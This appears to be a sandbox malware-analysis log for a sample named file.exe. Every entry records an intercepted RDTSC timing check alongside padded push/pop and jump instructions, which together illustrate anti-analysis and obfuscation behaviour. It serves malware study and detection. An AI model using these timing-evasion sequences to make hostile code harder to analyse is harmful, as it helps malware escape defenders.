Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F096F9 second address: F096FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0DBB7 second address: F0DBC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FEA44C7ED46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F0DBC3 second address: F0DBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F11930 second address: F11936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F11A79 second address: F11A83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FEA44C4CAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F11BDE second address: F11BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA44C7ED51h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F11BF6 second address: F11C26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABBh 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA44C4CABDh 0x00000014 jnl 00007FEA44C4CABEh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F11C26 second address: F11C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F11C2B second address: F11C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F11C38 second address: F11C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F11D8D second address: F11DBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CAC4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FEA44C4CABDh 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FEA44C4CAB6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F11DBC second address: F11DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F167CA second address: F167CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F167CF second address: F167FB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA44C7ED53h 0x00000008 jmp 00007FEA44C7ED4Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FEA44C7ED50h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F167FB second address: F1682F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FEA44C4CAB8h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f jmp 00007FEA44C4CABCh 0x00000014 jmp 00007FEA44C4CAC7h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F16C21 second address: F16C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F16C27 second address: F16C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F17076 second address: F170A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007FEA44C7ED4Fh 0x0000000f pop ecx 0x00000010 jmp 00007FEA44C7ED53h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F170A3 second address: F170A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F170A9 second address: F170AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1720D second address: F17218 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FEA44C4CAB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F17218 second address: F1721E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1721E second address: F17227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F17227 second address: F1722D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1E1D3 second address: F1E1D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1E330 second address: F1E33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FEA44C7ED46h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1E613 second address: F1E61D instructions: 0x00000000 rdtsc 0x00000002 je 00007FEA44C4CAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1E8CF second address: F1E8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1E8D7 second address: F1E8DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1E8DC second address: F1E8E1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1E8E1 second address: F1E8F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FEA44C4CAB6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1E8F2 second address: F1E90A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FEA44C7ED4Ch 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1E90A second address: F1E911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1F1B7 second address: F1F1DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED53h 0x00000007 jmp 00007FEA44C7ED4Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1F1DC second address: F1F1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1F1E2 second address: F1F1E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1FD8D second address: F1FDA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FEA44C4CACAh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F1FDA9 second address: F1FDAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F23121 second address: F23150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jmp 00007FEA44C4CAC2h 0x0000000c jmp 00007FEA44C4CAC3h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F232FC second address: F23325 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA44C7ED46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jl 00007FEA44C7ED56h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FEA44C7ED4Eh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F234C9 second address: F234F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CAC8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEA44C4CABEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F234F5 second address: F234F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F234F9 second address: F2352A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEA44C4CAC3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA44C4CAC4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2366F second address: F23693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007FEA44C7ED46h 0x0000000c popad 0x0000000d jmp 00007FEA44C7ED4Eh 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 push esi 0x00000017 pop esi 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F237D2 second address: F237D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F237D6 second address: F23805 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEA44C7ED53h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FEA44C7ED56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F23805 second address: F23840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA44C4CAC1h 0x00000008 jnl 00007FEA44C4CAB6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jg 00007FEA44C4CABCh 0x0000001c push eax 0x0000001d jno 00007FEA44C4CAB6h 0x00000023 pop eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F239B6 second address: F239BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F239BA second address: F239FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FEA44C4CAC8h 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 push esi 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop esi 0x00000015 popad 0x00000016 jp 00007FEA44C4CAD0h 0x0000001c jmp 00007FEA44C4CABCh 0x00000021 jc 00007FEA44C4CABEh 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F23B36 second address: F23B58 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEA44C7ED46h 0x00000008 jmp 00007FEA44C7ED55h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2875B second address: F28760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F28760 second address: F28768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2FFA1 second address: F2FFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2FFA9 second address: F2FFB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2FFB1 second address: F2FFB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2FFB7 second address: F2FFCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007FEA44C7ED4Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2FFCF second address: F2FFDF instructions: 0x00000000 rdtsc 0x00000002 je 00007FEA44C4CAC2h 0x00000008 ja 00007FEA44C4CAB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E1DE second address: F2E1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E1E2 second address: F2E1E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E1E6 second address: F2E1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FEA44C7ED46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E1F4 second address: F2E1FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E1FE second address: F2E202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E397 second address: F2E3CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jc 00007FEA44C4CAB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FEA44C4CAC9h 0x00000012 jmp 00007FEA44C4CABBh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E3CD second address: F2E3D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E6AA second address: F2E6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2E818 second address: F2E82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEA44C7ED50h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2EDB3 second address: F2EDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2EEF6 second address: F2EEFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2EEFC second address: F2EF00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2DD77 second address: F2DD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F2DD7B second address: F2DDA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEA44C4CAC7h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38D0C second address: F38D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA44C7ED4Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38D1C second address: F38D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3875A second address: F3875E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3875E second address: F38795 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEA44C4CAC2h 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FEA44C4CAC9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F38795 second address: F3879B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F3879B second address: F3879F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F45FD3 second address: F46001 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEA44C7ED46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FEA44C7ED4Bh 0x00000010 jmp 00007FEA44C7ED56h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F579E2 second address: F579E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F579E8 second address: F579F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEA44C7ED46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F579F2 second address: F57A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 je 00007FEA44C4CAD0h 0x0000000d push esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FEA44C4CAB6h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F57A0D second address: F57A13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F606C3 second address: F606C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F606C7 second address: F606DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jl 00007FEA44C7ED52h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F374 second address: F5F378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F378 second address: F5F387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FEA44C7ED46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F387 second address: F5F3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 jmp 00007FEA44C4CABEh 0x0000000d jmp 00007FEA44C4CABDh 0x00000012 pop ebx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F3B2 second address: F5F3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F3B6 second address: F5F3BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F3BA second address: F5F3C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F3C6 second address: F5F3E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CAC7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F3E3 second address: F5F3E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F3E9 second address: F5F3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F565 second address: F5F56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F56B second address: F5F596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FEA44C4CAB8h 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007FEA44C4CAB6h 0x00000016 jmp 00007FEA44C4CAC5h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5F6EE second address: F5F6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FEA44C7ED46h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F63AA2 second address: F63ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FEA44C4CAC6h 0x0000000b rdtsc
